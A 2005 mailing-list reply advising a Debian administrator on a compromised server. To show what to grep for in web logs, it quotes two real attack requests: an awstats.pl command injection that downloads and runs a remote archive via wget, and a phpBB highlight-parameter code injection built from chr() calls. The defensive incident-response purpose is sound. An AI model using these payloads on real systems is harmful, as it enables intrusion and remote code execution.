Re: a compromised machine
On Sun, Jul 24, 2005 at 09:54:28AM +0200, Nejc Novak wrote:
> I think one of my servers has been compromised. Since i don't have a lot
> of experiencei with these things, i beg you for your help.
>
> Information i have gathered together till now are the following. Server
> is runnin latest debian stable, sarge.
>
> There was heavy traffic on the server and ps aux reported several
> processes:
> www-data 2459 0.0 0.1 1616 608 ? S 01:31 0:00
> /tmp/dlciiqlno x
Since the process runs as "www-data" some kiddy has abused a web service
on your server to download and run an external software. Look for
suspicious log lines of your web server.
Examples of hacks on our servers:
82.55.78.243 - - [26/Feb/2005:20:04:59 +0100] "GET
/cgi-bin/awstats.pl?configdir=%20%7c%20cd%20%2ftmp%3bwget%20www.geocities.com%2fmadahack%2fa.tgz%3b%20tar%20zxf%20a.tgz%3b%20rm%20-f%20a.tgz%3b%20.%2fa%20%7c%20
HTTP/1.1" 200 422 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT
5.1; SV1; FunWebProducts)"
or
211-255-23-42.rev.krline.net - - [04/Dec/2004:17:43:06 +0100] "GET
/phpbb/viewto
pic.php?t=27&highlight=%2527%252esystem(chr(108)%252echr(115)%252echr(32)%252ech
r(45)%252echr(108)%252echr(97)%252echr(32)%252echr(47)%252echr(118)%252echr(97)%
252echr(114)%252echr(47)%252echr(119)%252echr(119)%252echr(119))%252e%2527
HTTP/
1.0" 200 28732 "-" "PHP/4.3.4"
It should be rather easy finding signs of weird accesses like %20 or
chr(). Also look for weird signs in /tmp.
If your server is important you should consider reinstalling.
Regards
Christoph
--
~
~
~
".signature" [Modified] 3 lines --100%-- 3,41 All
Reply to: